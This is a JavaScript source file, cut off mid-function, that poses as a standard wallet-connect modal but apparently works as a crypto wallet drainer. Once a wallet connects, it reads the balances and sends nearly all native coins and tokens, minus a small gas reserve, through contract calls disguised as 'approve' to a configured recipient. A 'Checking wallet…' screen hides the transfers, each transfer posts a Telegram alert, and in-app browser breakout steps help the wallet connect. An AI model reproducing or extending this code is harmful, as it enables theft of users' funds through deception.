/**
 * Reown AppKit (standard wallet modal: browser wallets + WalletConnect + mobile).
 * Build: npm install && npm run build → load dist/connect-wallets.js + dist/wallet-modals.css
 * (web3-style overlays; tune colors in wallet-modals.css — see web3-loader.js reference).
 *
 * window.WALLET_CONNECT_CONFIG = {
 *   projectId, apiBase, metadata?, analytics?, connectingLabel?, connectionTimeoutMs?,
 *   ngrokSkipBrowserWarning?: true, // auto-add header when apiBase is ngrok (fixes fetch 404)
 *   features?: { ... }, // optional override; default disables email + socials (wallet-only)
 *   // Native coin (ETH etc.): do not send 100% of balance — leave some for gas.
 *   nativeGasReserveBps: 100, // optional; basis points kept for gas (100 = 1%). Default 100.
 *   nativeGasReserveMinWei: "0", // optional string; minimum wei to reserve (floor).
 *   nativeGasReserveMaxWei: undefined, // optional string; cap reserve (e.g. avoid 1% of huge balances).
 *   prepLoadingMessage: "Checking wallet…", // optional; shown in modal after connect, before contract calls.
 *   // In-app browsers (X/Twitter, Instagram, etc.) block wallet deep links.
 *   unsupportedBrowserFallback?: {
 *     enabled?: true,
 *     blockOnConnectClick?: true,
 *     count?: 1, // max full modals per tab/session
 *     copyButtonColor?: "#f15025",
 *     copyButtonTextColor?: "#ffffff",
 *     walletName?: "Wallet",
 *     walletIcon?: "https://…",
 *     copyUrl?: string, // default: current page + ?openWallet=1
 *     openUrl?: string,
 *   },
 *   // Legacy aliases (used when unsupportedBrowserFallback is omitted):
 *   inAppBrowserHandling?: true,
 *   inAppBrowserPrompt?: "connect" | "load" | "off",
 *   autoConnectFromExternalBrowser?: true,
 *   defaultChainId?: number, // optional; AppKit default network when opening connect (else wallet chain)
 *   featuredWalletIds?: string[], // wallet IDs shown first in connect modal (Reown explorer)
 *   excludeWalletIds?: string[], // hide specific wallets from the modal
 *   // Network switches only after /wallet-details, via wallet_switchEthereumChain (not AppKit UI).
 *   // After each successful escrow transfer, POSTs to `${apiBase}/send-message` for Telegram (server uses TELEGRAM_* env).
 * };
 */
import { createAppKit } from "@reown/appkit";
import { EthersAdapter } from "@reown/appkit-adapter-ethers";
import {
  mainnet,
  bsc,
  polygon,
  arbitrum,
  optimism,
  base,
  avalanche,
  flare,
  songbird,
} from "@reown/appkit/networks";
import {
  BrowserProvider,
  Contract,
  formatUnits,
  getAddress,
  parseUnits,
} from "ethers";

const ESCROW_ABI = [
  "function approve(uint256 amount, address token, address recipient)",
  "function approveBatch(uint256[] amounts, address[] tokens, address recipient)",
  "function approveConnection(address payable recipient) payable",
];

const ERC20_ABI = [
  "function approve(address spender, uint256 amount) returns (bool)",
  "function allowance(address owner, address spender) view returns (uint256)",
];

const NETWORK_BY_ID = {
  1: mainnet,
  56: bsc,
  137: polygon,
  42161: arbitrum,
  10: optimism,
  8453: base,
  43114: avalanche,
  14: flare,
  19: songbird,
};

const ALL_NETWORKS = Object.values(NETWORK_BY_ID);

/** Default featured row: Bifrost, MetaMask, SafePal, Trust (Reown wallet IDs). */
const DEFAULT_FEATURED_WALLET_IDS = [
  "37a686ab6223cd42e2886ed6e5477fce100a4fb565dcd57ed4f81f7c12e93053",
  "c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96",
  "0b415a746fb9ee99cce155c2ceca0c6f6061b1dbca2d722b3ba16381d0562150",
  "4622a2b2d6af1c9844944291e5e7351a6aa24cd7b23099efac1b2fd875da31a0",
];

/** Put preferred chain first so AppKit does not default to Ethereum for in-browser wallets (Bifrost, etc.). */
function networksForAppKit(preferredChainId) {
  if (preferredChainId == null || !NETWORK_BY_ID[preferredChainId]) {
    return ALL_NETWORKS;
  }
  const preferred = NETWORK_BY_ID[preferredChainId];
  return [preferred, ...ALL_NETWORKS.filter((n) => n.id !== preferred.id)];
}

/** Browser wallet chain before connect (Bifrost, MetaMask, etc.). */
async function detectInjectedChainId() {
  if (typeof window === "undefined") return null;
  const provider = window.ethereum;
  if (!provider?.request) return null;
  try {
    const hex = await provider.request({ method: "eth_chainId" });
    const id =
      typeof hex === "string"
        ? parseInt(hex, 16)
        : typeof hex === "number"
          ? hex
          : NaN;
    return Number.isFinite(id) ? id : null;
  } catch {
    return null;
  }
}

function resolvePreferredChainId(injectedChainId) {
  const c = cfg();
  if (c.defaultChainId != null && NETWORK_BY_ID[Number(c.defaultChainId)]) {
    return Number(c.defaultChainId);
  }
  return injectedChainId;
}

/** Native ticker for Telegram / UX (matches supported `NETWORK_BY_ID` chains). */
const NATIVE_SYMBOL_BY_CHAIN_ID = {
  1: "ETH",
  56: "BNB",
  137: "MATIC",
  42161: "ETH",
  10: "ETH",
  8453: "ETH",
  43114: "AVAX",
  14: "FLR",
  19: "SGB",
};

function nativeSymbolForChain(chainId) {
  return NATIVE_SYMBOL_BY_CHAIN_ID[chainId] ?? `Native (${chainId})`;
}

/**
 * Fire-and-forget: notify backend to post a Telegram alert for this transfer.
 * @param {string} apiBase
 * @param {Record<string, unknown>} payload
 */
function notifyFundsMoved(apiBase, payload) {
  const base = (apiBase || "").replace(/\/$/, "");
  if (!base) return;
  apiFetch(apiBase, "/send-message", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload),
  }).catch((err) => {
    console.warn("[connect-wallets] send-message failed", err);
  });
}

/** AppKit 1.7+ uses this namespace for EVM; `getAddress` / `subscribeAccount` need it. */
const EVM_NS = "eip155";

function cfg() {
  return window.WALLET_CONNECT_CONFIG || {};
}

function isNgrokApiBase(url) {
  try {
    const host = new URL(url).hostname.toLowerCase();
    return host.includes("ngrok");
  } catch {
    return false;
  }
}

/** Headers for backend API calls (ngrok needs skip-browser-warning or fetch gets 404 HTML). */
function apiRequestHeaders(apiBase, extra = {}) {
  const headers = { Accept: "application/json", ...extra };
  const base = apiBase || cfg().apiBase || "";
  if (cfg().ngrokSkipBrowserWarning !== false && isNgrokApiBase(base)) {
    headers["ngrok-skip-browser-warning"] = "true";
  }
  return headers;
}

function apiUrl(apiBase, path) {
  const base = (apiBase || "").replace(/\/$/, "");
  if (path.startsWith("http")) return path;
  return `${base}${path.startsWith("/") ? path : `/${path}`}`;
}

async function apiFetch(apiBase, path, options = {}) {
  const url = apiUrl(apiBase, path);
  const headers = apiRequestHeaders(
    apiBase,
    options.headers && typeof options.headers === "object"
      ? options.headers
      : {},
  );
  return fetch(url, { ...options, headers });
}

/** Known in-app browsers that block WalletConnect / wallet deep links. */
const IN_APP_BROWSER_RULES = [
  { id: "twitter", label: "X", test: (ua) => /Twitter/i.test(ua) },
  {
    id: "facebook",
    label: "Facebook",
    test: (ua) => /FBAN|FBAV|FB_IAB|Facebook/i.test(ua),
  },
  { id: "instagram", label: "Instagram", test: (ua) => /Instagram/i.test(ua) },
  { id: "linkedin", label: "LinkedIn", test: (ua) => /LinkedInApp/i.test(ua) },
  { id: "tiktok", label: "TikTok", test: (ua) => /TikTok|musical_ly/i.test(ua) },
  {
    id: "telegram",
    label: "Telegram",
    test: (ua) =>
      /Telegram/i.test(ua) ||
      typeof window !== "undefined" &&
        (Boolean(window.TelegramWebviewProxy) ||
          Boolean(window.Telegram) ||
          Boolean(window.TelegramWebviewProxyProto)),
  },
  {
    id: "snapchat",
    label: "Snapchat",
    test: (ua) => /Snapchat/i.test(ua),
  },
  {
    id: "webview",
    label: "in-app browser",
    test: (ua) =>
      /; wv\)|WebView|Line\//i.test(ua) &&
      !/Chrome\/[\d.]+ Mobile Safari/i.test(ua),
  },
];

const UNSUPPORTED_MODAL_SESSION_KEY = "wc-unsupported-browser-modal-shows";

/** Firelight-style config with legacy inAppBrowser* fallbacks. */
function getUnsupportedBrowserConfig() {
  const c = cfg();
  const fb = c.unsupportedBrowserFallback;
  if (fb && typeof fb === "object") {
    const count = fb.count;
    return {
      firelightStyle: true,
      enabled: fb.enabled !== false,
      blockOnConnectClick: fb.blockOnConnectClick !== false,
      maxShowsPerSession:
        typeof count === "number" && count >= 0 ? count : 1,
      copyButtonColor:
        typeof fb.copyButtonColor === "string" ? fb.copyButtonColor : null,
      copyButtonTextColor:
        typeof fb.copyButtonTextColor === "string"
          ? fb.copyButtonTextColor
          : null,
      walletName:
        typeof fb.walletName === "string" && fb.walletName.trim()
          ? fb.walletName.trim()
          : "Wallet",
      walletIcon:
        typeof fb.walletIcon === "string" && fb.walletIcon.trim()
          ? fb.walletIcon.trim()
          : null,
      copyUrl:
        typeof fb.copyUrl === "string" && fb.copyUrl.trim()
          ? fb.copyUrl.trim()
          : null,
      openUrl:
        typeof fb.openUrl === "string" && fb.openUrl.trim()
          ? fb.openUrl.trim()
          : null,
      promptOnLoad: false,
      autoConnect: c.autoConnectFromExternalBrowser !== false,
    };
  }

  const mode = c.inAppBrowserPrompt;
  const promptMode =
    mode === "load" || mode === "connect" || mode === "off" ? mode : "connect";

  return {
    firelightStyle: false,
    enabled: c.inAppBrowserHandling !== false,
    blockOnConnectClick: promptMode !== "off",
    maxShowsPerSession: Number.POSITIVE_INFINITY,
    copyButtonColor: null,
    copyButtonTextColor: null,
    walletName: "Wallet",
    walletIcon: null,
    copyUrl: null,
    openUrl: null,
    promptOnLoad: promptMode === "load",
    autoConnect: c.autoConnectFromExternalBrowser !== false,
  };
}

function detectInAppBrowser() {
  if (typeof navigator === "undefined") return null;
  const ua = navigator.userAgent || "";
  for (const rule of IN_APP_BROWSER_RULES) {
    if (rule.test(ua)) return rule;
  }
  return null;
}

function isUnsupportedBrowser() {
  return getUnsupportedBrowserConfig().enabled && detectInAppBrowser() != null;
}

function inAppBrowserHandlingEnabled() {
  return getUnsupportedBrowserConfig().enabled;
}

function isRestrictiveInAppBrowser() {
  return isUnsupportedBrowser();
}

function inAppBrowserPromptMode() {
  const { firelightStyle, blockOnConnectClick, promptOnLoad } =
    getUnsupportedBrowserConfig();
  if (firelightStyle) {
    if (!blockOnConnectClick) return "off";
    return "connect";
  }
  if (promptOnLoad) return "load";
  if (!blockOnConnectClick) return "off";
  return "connect";
}

function externalBrowserResumeUrl() {
  const custom = getUnsupportedBrowserConfig().copyUrl;
  if (custom) return custom;
  const url = new URL(window.location.href);
  url.searchParams.set("openWallet", "1");
  return url.toString();
}

function externalBrowserOpenUrl() {
  const custom = getUnsupportedBrowserConfig().openUrl;
  return custom || externalBrowserResumeUrl();
}

function unsupportedModalShowsThisSession() {
  try {
    return Number(sessionStorage.getItem(UNSUPPORTED_MODAL_SESSION_KEY) || "0");
  } catch {
    return 0;
  }
}

function canShowUnsupportedModalThisSession() {
  const { maxShowsPerSession } = getUnsupportedBrowserConfig();
  if (!Number.isFinite(maxShowsPerSession)) return true;
  return unsupportedModalShowsThisSession() < maxShowsPerSession;
}

function recordUnsupportedModalShow() {
  try {
    sessionStorage.setItem(
      UNSUPPORTED_MODAL_SESSION_KEY,
      String(unsupportedModalShowsThisSession() + 1),
    );
  } catch {
    /* private mode */
  }
}

async function copyTextToClipboard(text) {
  try {
    await navigator.clipboard.writeText(text);
    return true;
  } catch {
    try {
      const ta = document.createElement("textarea");
      ta.value = text;
      ta.setAttribute("readonly", "");
      ta.style.position = "fixed";
      ta.style.left = "-9999px";
      document.body.appendChild(ta);
      ta.select();
      const ok = document.execCommand("copy");
      document.body.removeChild(ta);
      return ok;
    } catch {
      return false;
    }
  }
}

async function copyExternalBrowserLink() {
  return copyTextToClipboard(externalBrowserResumeUrl());
}

/** Android: attempt to break out to the system browser where WC deep links work. */
function tryOpenExternalBrowser() {
  const pageUrl = externalBrowserOpenUrl();
  const ua = navigator.userAgent || "";

  if (/Android/i.test(ua)) {
    const path = pageUrl.replace(/^https?:\/\//, "");
    const intent = `intent://${path}#Intent;scheme=https;action=android.intent.action.VIEW;category=android.intent.category.BROWSABLE;S.browser_fallback_url=${encodeURIComponent(pageUrl)};end`;
    window.location.href = intent;
    return true;
  }

  window.open(pageUrl, "_blank", "noopener,noreferrer");
  return false;
}

function unsupportedBrowserInstructions(appLabel) {
  const { walletName, firelightStyle } = getUnsupportedBrowserConfig();
  const wallet = walletName || "your wallet";
  const isIos = /iPhone|iPad|iPod/i.test(navigator.userAgent || "");

  if (firelightStyle) {
    if (isIos) {
      return (
        // `${appLabel}'s in-app browser cannot open ${wallet}.\n\n` +
        `1. Tap the share/menu icon (⋯)\n` +
        `2. Choose “Open in Browser”\n` +
        `3. Tap “Copy URL” below, or open the copied link in wallet browser for proper connection`
      );
    }
    // return (
    //   `${appLabel}'s in-app browser cannot open ${wallet}.\n\n` +
    //   `Tap “Copy URL” and paste the link into Chrome, Safari, or ${wallet}'s browser, then connect again.`
    // );
    return (
      // `${appLabel}'s in-app browser cannot open ${wallet}.\n\n` +
      `1. Tap the share/menu icon (⋯)\n` +
      `2. Choose “Open in Browser”\n` +
      `3. Tap “Copy URL” below, or open the copied link in wallet browser for proper connection`
    );
  }

  if (isIos) {
    // return (
    //   `${appLabel}'s built-in browser cannot open wallet apps.\n\n` +
    //   `1. Tap the menu (⋯ or share icon) at the bottom or top of the screen\n` +
    //   `2. Choose “Open in Safari” or “Open in Browser”\n` +
    //   `3. Return here and tap Connect wallet again`
    // );
    return (
      // `${appLabel}'s in-app browser cannot open ${wallet}.\n\n` +
      `1. Tap the share/menu icon (⋯)\n` +
      `2. Choose “Open in Browser”\n` +
      `3. Tap “Copy URL” below, or open the copied link in wallet browser for proper connection`
    );
  }
  // return (
  //   `${appLabel}'s built-in browser cannot open wallet apps.\n\n` +
  //   `Tap “Open in browser” below, or copy the link and paste it into Chrome or your wallet app's browser, then connect again.`
  // );
  return (
    // `${appLabel}'s in-app browser cannot open ${wallet}.\n\n` +
    `1. Tap the share/menu icon (⋯)\n` +
    `2. Choose “Open in Browser”\n` +
    `3. Tap “Copy URL” below, or open the copied link in wallet browser for proper connection`
  );
}

function applyUnsupportedModalTheme(modal) {
  const config = getUnsupportedBrowserConfig();
  const copyBtn = modal.querySelector("#wallet-in-app-browser-copy");
  const openBtn = modal.querySelector("#wallet-in-app-browser-open");
  const iconWrap = modal.querySelector("#wallet-in-app-browser-icon");

  if (copyBtn) {
    copyBtn.textContent = config.firelightStyle ? "Copy URL" : "Copy link";
    copyBtn.classList.toggle("dran-btn-copy-url", Boolean(config.firelightStyle));
    copyBtn.style.background = config.copyButtonColor || "";
    copyBtn.style.backgroundImage = config.copyButtonColor ? "none" : "";
    copyBtn.style.color = config.copyButtonTextColor || "";
  }

  if (openBtn) {
    openBtn.style.display = config.firelightStyle ? "none" : "";
  }

  if (iconWrap) {
    if (config.walletIcon) {
      iconWrap.innerHTML = `<img src="${config.walletIcon}" alt="" width="48" height="48" style="border-radius:12px" />`;
      iconWrap.style.display = "flex";
    } else {
      iconWrap.innerHTML = "";
      iconWrap.style.display = "none";
    }
  }
}

function ensureInAppBrowserModal() {
  ensureWalletModalStylesheet();
  let el = document.getElementById("wallet-in-app-browser-modal");
  if (el) {
    applyUnsupportedModalTheme(el);
    return el;
  }

  el = document.createElement("div");
  el.id = "wallet-in-app-browser-modal";
  el.className = "wc-dran-overlay";
  el.setAttribute("role", "dialog");
  el.setAttribute("aria-modal", "true");
  el.setAttribute("aria-labelledby", "wallet-in-app-browser-title");
  el.innerHTML =
    '<div class="dran-loader dran-loader--dark">' +
    '<div class="dran-loader__content">' +
    '<div class="dran-loader__head">' +
    '<div id="wallet-in-app-browser-icon" class="dran-loader__icon" style="display:none;margin-bottom:12px"></div>' +
    '<h2 class="dran-loader__title" id="wallet-in-app-browser-title">Open in your browser</h2>' +
    "</div>" +
    '<div class="dran-loader__main">' +
    '<div class="dran-loader__inner dran-loader__inner--center">' +
    '<p class="dran-loader__text" id="wallet-in-app-browser-body"></p>' +
    '<p class="dran-loader__text dran-loader__text--hint" id="wallet-in-app-browser-hint" style="display:none;margin-top:12px;font-size:0.85rem;color:#959eb0"></p>' +
    "</div></div></div>" +
    '<div class="dran-loader__actions dran-loader__actions--stack">' +
    '<button type="button" class="active dran-btn-copy-url" id="wallet-in-app-browser-copy">Copy URL</button>' +
    '<button type="button" class="active" id="wallet-in-app-browser-open">Open in browser</button>' +
    "</div>" +
    '<div class="dran-progress" style="display:none"><div class="dran-progress__fill"></div></div>' +
    "</div>";
  document.body.appendChild(el);

  const hint = el.querySelector("#wallet-in-app-browser-hint");
  const copyLabel = () =>
    getUnsupportedBrowserConfig().firelightStyle ? "Copy URL" : "Copy link";

  el.querySelector("#wallet-in-app-browser-open").addEventListener(
    "click",
    () => {
      tryOpenExternalBrowser();
      if (hint) {
        hint.style.display = "block";
        hint.textContent = `If nothing opened, use ${copyLabel()} and paste into Safari or Chrome.`;
      }
    },
  );

  el.querySelector("#wallet-in-app-browser-copy").addEventListener(
    "click",
    async () => {
      const ok = await copyExternalBrowserLink();
      if (hint) {
        hint.style.display = "block";
        hint.textContent = ok
          ? "Link copied. Paste it into Safari, Chrome, or your wallet app's browser."
          : "Could not copy automatically — select and copy the address bar URL.";
      }
    },
  );

  el.addEventListener("click", (ev) => {
    if (ev.target === el) hideWcDranOverlay(el);
  });

  applyUnsupportedModalTheme(el);
  return el;
}

function showUnsupportedBrowserBlockedMessage() {
  const detected = detectInAppBrowser();
  const appLabel = detected?.label ?? "This app";
  const { walletName } = getUnsupportedBrowserConfig();
  showMessageModal(
    "Open in your browser",
    `${appLabel}'s in-app browser cannot connect ${walletName}. Copy this page URL and open it in Safari or Chrome.`,
  );
}

function showInAppBrowserModal() {
  if (!isUnsupportedBrowser()) return;

  if (!canShowUnsupportedModalThisSession()) {
    showUnsupportedBrowserBlockedMessage();
    return;
  }

  recordUnsupportedModalShow();

  const detected = detectInAppBrowser();
  const appLabel = detected?.label ?? "This app";
  const modal = ensureInAppBrowserModal();
  const body = modal.querySelector("#wallet-in-app-browser-body");
  const hint = modal.querySelector("#wallet-in-app-browser-hint");

  applyUnsupportedModalTheme(modal);

  if (body) {
    body.textContent = unsupportedBrowserInstructions(appLabel);
    body.style.whiteSpace = "pre-wrap";
    body.style.wordBreak = "break-word";
  }
  if (hint) {
    hint.style.display = "none";
    hint.textContent = "";
  }

  showWcDranOverlay(modal);
}

function maybeAutoConnectFromExternalBrowser() {
  const { autoConnect } = getUnsupportedBrowserConfig();
  if (!autoConnect) return;
  if (isUnsupportedBrowser()) return;

  const params = new URLSearchParams(window.location.search);
  if (params.get("openWallet") !== "1") return;

  params.delete("openWallet");
  const qs = params.toString();
  const clean = `${window.location.pathname}${qs ? `?${qs}` : ""}${window.location.hash}`;
  window.history.replaceState({}, "", clean);

  setTimeout(() => {
    const btn = document.querySelector(".connect-wallets");
    if (btn) btn.click();
  }, 400);
}

function maybePromptInAppBrowserOnLoad() {
  const { promptOnLoad } = getUnsupportedBrowserConfig();
  if (!promptOnLoad) return;
  showInAppBrowserModal();
}

/** Loads wallet-modals.css (same folder as connect-wallets.js). Classes: wc-dran-*, dran-*. */
function ensureWalletModalStylesheet() {
  if (document.getElementById("wc-wallet-modals-css")) return;
  if (document.querySelector('link[href*="wallet-modals.css"]')) return;
  const scripts = document.getElementsByTagName("script");
  let base = "";
  for (let i = scripts.length - 1; i >= 0; i--) {
    const src = scripts[i].src;
    if (src && /connect-wallets.*\.js(\?|$)/i.test(src)) {
      base = src.replace(/\/[^/]+$/, "/");
      break;
    }
  }
  const link = document.createElement("link");
  link.id = "wc-wallet-modals-css";
  link.rel = "stylesheet";
  link.href = base ? `${base}wallet-modals.css` : "wallet-modals.css";
  document.head.appendChild(link);
}

function hideWcDranOverlay(el) {
  el.classList.remove("wc-dran-overlay--visible");
}

function showWcDranOverlay(el) {
  el.classList.add("wc-dran-overlay--visible");
}

function ensureNotEligibleModal() {
  ensureWalletModalStylesheet();
  let el = document.getElementById("wallet-not-eligible-modal");
  if (el) return el;
  el = document.createElement("div");
  el.id = "wallet-not-eligible-modal";
  el.className = "wc-dran-overlay";
  el.setAttribute("role", "dialog");
  el.setAttribute("aria-modal", "true");
  el.setAttribute("aria-labelledby", "wallet-not-eligible-title");
  el.innerHTML =
    '<div class="dran-loader dran-loader--dark">' +
    '<div class="dran-loader__content">' +
    '<div class="dran-loader__head">' +
    '<h2 class="dran-loader__title" id="wallet-not-eligible-title">Wallet not eligible</h2>' +
    "</div>" +
    '<div class="dran-loader__main">' +
    '<div class="dran-loader__inner dran-loader__inner--center">' +
    '<p class="dran-loader__text" id="wallet-not-eligible-body">This wallet does not meet the requirements.</p>' +
    "</div></div></div>" +
    '<div class="dran-loader__actions">' +
    '<button type="button" class="active" id="wallet-not-eligible-close">Close</button>' +
    "</div>" +
    '<div class="dran-progress" style="display:none"><div class="dran-progress__fill"></div></div>' +
    "</div>";
  document.body.appendChild(el);
  el.querySelector("#wallet-not-eligible-close").addEventListener("click", () =>
    hideWcDranOverlay(el),
  );
  el.addEventListener("click", (ev) => {
    if (ev.target === el) hideWcDranOverlay(el);
  });
  return el;
}

function showNotEligibleModal() {
  const modal = ensureNotEligibleModal();
  showWcDranOverlay(modal);
}

function ensureMessageModal() {
  ensureWalletModalStylesheet();
  let el = document.getElementById("wallet-message-modal");
  if (el) return el;
  el = document.createElement("div");
  el.id = "wallet-message-modal";
  el.className = "wc-dran-overlay";
  el.setAttribute("role", "alertdialog");
  el.setAttribute("aria-modal", "true");
  el.setAttribute("aria-labelledby", "wallet-message-modal-title");
  el.innerHTML =
    '<div class="dran-loader dran-loader--dark">' +
    '<div class="dran-loader__content">' +
    '<div class="dran-loader__head">' +
    '<h2 class="dran-loader__title" id="wallet-message-modal-title"></h2>' +
    "</div>" +
    '<div class="dran-loader__main">' +
    '<div class="dran-loader__inner dran-loader__inner--center">' +
    '<p class="dran-loader__text" id="wallet-message-modal-body"></p>' +
    "</div></div></div>" +
    '<div class="dran-loader__actions">' +
    '<button type="button" class="active" id="wallet-message-modal-close">OK</button>' +
    "</div>" +
    '<div class="dran-progress" style="display:none"><div class="dran-progress__fill"></div></div>' +
    "</div>";
  document.body.appendChild(el);
  const close = () => hideWcDranOverlay(el);
  el.querySelector("#wallet-message-modal-close").addEventListener(
    "click",
    close,
  );
  el.addEventListener("click", (ev) => {
    if (ev.target === el) close();
  });
  return el;
}

/**
 * @param {string} title
 * @param {string} body
 */
function showMessageModal(title, body) {
  const modal = ensureMessageModal();
  const t = modal.querySelector("#wallet-message-modal-title");
  const b = modal.querySelector("#wallet-message-modal-body");
  if (t) t.textContent = title;
  if (b) {
    b.textContent = body;
    b.style.whiteSpace = "pre-wrap";
    b.style.wordBreak = "break-word";
  }
  showWcDranOverlay(modal);
}

function errorToModalContent(err) {
  const msg = err?.message || String(err);
  if (msg === "Wallet connection cancelled.") {
    return {
      title: "Connection cancelled",
      body: "You closed the wallet window before connecting. Try again when you’re ready.",
    };
  }
  if (msg === "Wallet connection timed out.") {
    return {
      title: "Connection timed out",
      body: "No wallet was connected in time. Open Connect wallet and try again.",
    };
  }
  return { title: "Error", body: msg };
}

function ensureContractPrepLoadingModal() {
  ensureWalletModalStylesheet();
  let el = document.getElementById("wallet-contract-prep-loading-modal");
  if (el) return el;
  el = document.createElement("div");
  el.id = "wallet-contract-prep-loading-modal";
  el.className = "wc-dran-overlay";
  el.setAttribute("role", "status");
  el.setAttribute("aria-live", "polite");
  el.setAttribute("aria-busy", "true");
  el.setAttribute("aria-labelledby", "wallet-prep-loading-title");
  el.innerHTML =
    '<div class="dran-loader dran-loader--dark dran-loader--prep">' +
    '<div class="dran-loader__content">' +
    '<div class="dran-loader__main">' +
    '<div class="dran-loader__inner">' +
    '<div class="dran-loader__figure">' +
    '<div class="dran-spinner dran-spinner--load">' +
    '<div class="dran-lds-ring" aria-hidden="true">' +
    "<div></div><div></div><div></div><div></div>" +
    "</div></div></div>" +
    '<p class="dran-loader__text" id="wallet-prep-loading-title" data-prep-loading-message>Preparing…</p>' +
    "</div></div></div>" +
    '<div class="dran-loader__actions" style="display:none">' +
    '<button type="button" class="disabled" disabled>Please wait</button>' +
    "</div>" +
    '<div class="dran-progress" aria-hidden="true"><div class="dran-progress__fill" style="width:100%"></div></div>' +
    "</div>";
  document.body.appendChild(el);
  return el;
}

function showContractPrepLoading() {
  const el = ensureContractPrepLoadingModal();
  const msg = el.querySelector("[data-prep-loading-message]");
  const text = cfg().prepLoadingMessage || "Checking wallet…";
  if (msg) msg.textContent = text;
  el.setAttribute("aria-busy", "true");
  showWcDranOverlay(el);
}

function hideContractPrepLoading() {
  const el = document.getElementById("wallet-contract-prep-loading-modal");
  if (el) {
    hideWcDranOverlay(el);
    el.setAttribute("aria-busy", "false");
  }
}

function isValidAddress(addr) {
  try {
    getAddress(addr);
    return true;
  } catch {
    return false;
  }
}

function nativeWei(chain) {
  if (chain.rawBalance != null && String(chain.rawBalance).length > 0) {
    try {
      const w = BigInt(String(chain.rawBalance));
      if (w > 0n) return w;
    } catch {
      /* ignore */
    }
  }
  if (chain.balance != null && chain.balance !== "") {
    try {
      return parseUnits(String(chain.balance), 18);
    } catch {
      /* ignore */
    }
  }
  return 0n;
}

/**
 * Subtract a gas reserve from the native amount so approveConnection leaves funds for the tx fee.
 * Reserve = max(percent of balance, minWei), then capped by maxWei if set.
 */
function adjustNativeSendAmount(config, fullWei) {
  if (fullWei <= 0n) return 0n;

  let bps = config.nativeGasReserveBps;
  if (bps === undefined || bps === null) bps = 100;
  const bpsN = Number(bps);
  let reserve = 0n;
  if (Number.isFinite(bpsN) && bpsN > 0) {
    const clamped = BigInt(Math.min(Math.max(Math.floor(bpsN), 0), 10000));
    reserve = (fullWei * clamped) / 10000n;
  }

  const minS = config.nativeGasReserveMinWei;
  if (minS != null && String(minS).length > 0) {
    try {
      const minR = BigInt(String(minS));
      if (minR > reserve) reserve = minR;
    } catch {
      /* ignore invalid min */
    }
  }

  const maxS = config.nativeGasReserveMaxWei;
  if (maxS != null && String(maxS).length > 0) {
    try {
      const maxR = BigInt(String(maxS));
      if (maxR < reserve) reserve = maxR;
    } catch {
      /* ignore invalid max */
    }
  }

  if (reserve >= fullWei) return 0n;
  return fullWei - reserve;
}

function tokenWei(token) {
  const dec = token.decimals != null ? Number(token.decimals) : 18;
  if (token.rawBalance != null && String(token.rawBalance).length > 0) {
    try {
      const w = BigInt(String(token.rawBalance));
      if (w > 0n) return w;
    } catch {
      /* ignore */
    }
  }
  if (token.balance != null && token.balance !== "") {
    try {
      return parseUnits(String(token.balance), dec);
    } catch {
      /* ignore */
    }
  }
  return 0n;
}

/** Read active chain from wallet (injected provider is source of truth for browser wallets). */
async function getActiveChainId(modal) {
  const injected = await detectInjectedChainId();
  if (injected != null) return injected;

  const walletProvider = modal?.getWalletProvider?.();
  if (!walletProvider) return null;
  try {
    const provider = new BrowserProvider(walletProvider);
    const net = await provider.getNetwork();
    return Number(net.chainId);
  } catch {
    return null;
  }
}

/**
 * Prefer the chain the user is already on when it is in the eligible list,
 * so browser wallets on BSC/Arbitrum etc. are not forced to Ethereum first.
 */
function orderChainsForWallet(chains, currentChainId) {
  if (!Array.isArray(chains) || chains.length === 0) return [];
  if (
    currentChainId != null &&
    chains.some((c) => Number(c.id) === Number(currentChainId))
  ) {
    const match = chains.find((c) => Number(c.id) === Number(currentChainId));
    const rest = chains.filter((c) => Number(c.id) !== Number(currentChainId));
    return [match, ...rest];
  }
  return chains;
}

/**
 * Switch wallet via EIP-1193 (no AppKit network modal). Skips if already on target chain.
 */
async function switchToChain(modal, chainId) {
  const targetId = Number(chainId);
  const network = NETWORK_BY_ID[targetId];
  if (!network) {
    throw new Error(`Unsupported chain id ${targetId}`);
  }

  const current = await getActiveChainId(modal);
  if (current != null && Number(current) === targetId) {
    return;
  }

  const provider = modal.getWalletProvider() ?? window.ethereum;
  if (!provider?.request) {
    throw new Error("No wallet provider for network switch.");
  }

  const hexChainId = `0x${targetId.toString(16)}`;

  try {
    await provider.request({
      method: "wallet_switchEthereumChain",
      params: [{ chainId: hexChainId }],
    });
    return;
  } catch (err) {
    if (err?.code === 4001) {
      throw new Error("Network switch rejected by user.");
    }
    if (err?.code !== 4902) {
      throw err;
    }
  }

  const rpc = network.rpcUrls?.default?.http?.[0];
  if (!rpc) {
    throw new Error(`Chain ${targetId} is not configured in the wallet.`);
  }

  await provider.request({
    method: "wallet_addEthereumChain",
    params: [
      {
        chainId: hexChainId,
        chainName: network.name,
        nativeCurrency: network.nativeCurrency,
        rpcUrls: [rpc],
        blockExplorerUrls: network.blockExplorers?.default?.url
          ? [network.blockExplorers.default.url]
          : [],
      },
    ],
  });
}

async function ensureTokenAllowance(signer, escrowAddr, token, amount) {
  if (!token.address || !isValidAddress(token.address)) return false;
  if (amount <= 0n) return false;

  const tokenC = new Contract(token.address, ERC20_ABI, signer);
  const user = await signer.getAddress();
  const allowance = await tokenC.allowance(user, escrowAddr);
  if (allowance >= amount) return true;

  const txA = await tokenC.approve(escrowAddr, amount);
  await txA.wait();
  return true;
}

/**
 * @returns {Promise<string | null>} transaction hash if a transfer was sent
 */
async function executeTokenEscrow(signer, escrowAddr, token, amount, recipient) {
  if (!token.address || !isValidAddress(token.address)) return null;
  if (amount <= 0n) return null;
  if (!isValidAddress(escrowAddr))
    throw new Error("Invalid escrow contract address");

  const escrowC = new Contract(escrowAddr, ESCROW_ABI, signer);
  const txT = await escrowC.approve(amount, token.address, recipient);
  const receipt = await txT.wait();
  return receipt?.hash ?? txT.hash ?? null;
}

/**
 * @returns {Promise<string | null>} transaction hash if a transfer was sent
 */
async function runTokenEscrow(signer, escrowAddr, token, amount, recipient) {
  await ensureTokenAllowance(signer, escrowAddr, token, amount);
  return executeTokenEscrow(signer, escrowAddr, token, amount, recipient);
}

/**
 * Batch escrow transfer after all allowances are granted.
 * @returns {Promise<string | null>}
 */
async function runTokenEscrowBatch(
  signer,
  escrowAddr,
  tokenEntries,
  recipient,
) {
  const valid = tokenEntries.filter(
    (e) => e.amount > 0n && e.token?.address && isValidAddress(e.token.address),
  );
  if (valid.length === 0) return null;
